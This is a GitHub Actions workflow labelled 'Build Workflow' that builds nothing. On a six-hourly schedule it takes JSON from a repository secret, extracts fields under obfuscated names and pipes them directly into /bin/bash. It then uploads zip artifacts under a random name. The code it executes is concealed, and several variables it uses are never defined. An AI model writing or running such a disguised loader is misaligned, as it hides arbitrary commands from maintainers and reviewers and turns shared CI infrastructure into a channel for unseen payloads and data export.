name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '11 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          oenu18: ${{ secrets.oenu18 }}
        run: |
          printf '%s' "$oenu18" | jq -r .oql20210 | /bin/bash
          echo $mibj95 | jq -r .fz70362 | /bin/bash
          printf '%s' "$knfk6" | jq -r .xhibn01 | /bin/bash
          printf '%s' "$nmbu401" | jq -r .cpdcm66 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 0o6fPE46
          path: "*.zip"
          retention-days: 1
